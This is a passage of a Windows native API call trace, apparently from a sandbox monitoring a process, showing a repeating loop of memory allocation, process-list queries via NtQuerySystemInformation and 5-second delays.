BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.322] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.329] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.356] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.363] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.410] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 